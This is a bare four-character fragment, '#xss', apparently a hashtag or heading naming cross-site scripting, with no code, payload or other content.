#xss